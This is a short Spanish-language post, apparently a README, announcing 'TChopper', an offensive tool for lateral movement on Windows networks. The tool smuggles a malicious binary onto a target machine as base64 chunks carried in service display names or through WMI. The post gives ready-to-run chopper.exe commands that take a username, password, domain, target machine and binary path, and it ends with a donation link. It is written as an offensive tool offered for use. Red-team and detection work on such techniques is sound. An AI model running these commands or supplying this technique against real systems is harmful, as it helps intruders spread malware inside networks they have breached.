
realizar un ataque de movimiento lateral aprovechando el nombre para mostrar de servicios no filtrados para introducir binarios en fragmentos en la máquina objetivo
Nueva técnica que he descubierto recientemente y le he dado un apodo (Chop chop) para realizar movimiento lateral utilizando el nombre para mostrar de servicios de Windows y WMI, contrabandeando el binario malicioso como fragmentos base64 y automatizando el proceso con la herramienta TChopper.
image
mientras que si estás realizando un movimiento lateral usando la técnica WMI, también puedes usar Chopper para hacerlo
image
#chop chop mode
chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# chop chop done
chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
# use WMI to smuggle
chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
Creo herramientas de seguridad ofensiva para la comunidad de código abierto, muestra tu apoyo https://paypal.me/0xsp